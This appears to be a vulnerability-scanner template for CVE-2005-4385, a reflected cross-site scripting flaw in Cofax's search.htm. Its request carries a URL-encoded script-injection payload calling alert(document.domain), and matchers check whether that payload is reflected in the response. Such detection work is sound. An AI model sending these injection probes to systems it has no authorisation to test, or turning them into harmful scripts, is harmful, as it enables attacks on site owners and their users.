2021-08-06 16:35:36 +00:00
id : CVE-2005-4385
info :
name : Cofax <= 2.0RC3 XSS
description : Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference :
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author : geeknik
severity : medium
2021-08-07 09:36:29 +00:00
tags : cofax,xss,cve,cve2005
2021-08-06 16:35:36 +00:00
requests :
- method : GET
path :
2021-08-07 09:36:29 +00:00
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-08-06 16:35:36 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
words :
2021-08-07 09:36:29 +00:00
- "'>\"</script><script>alert(document.domain)</script>"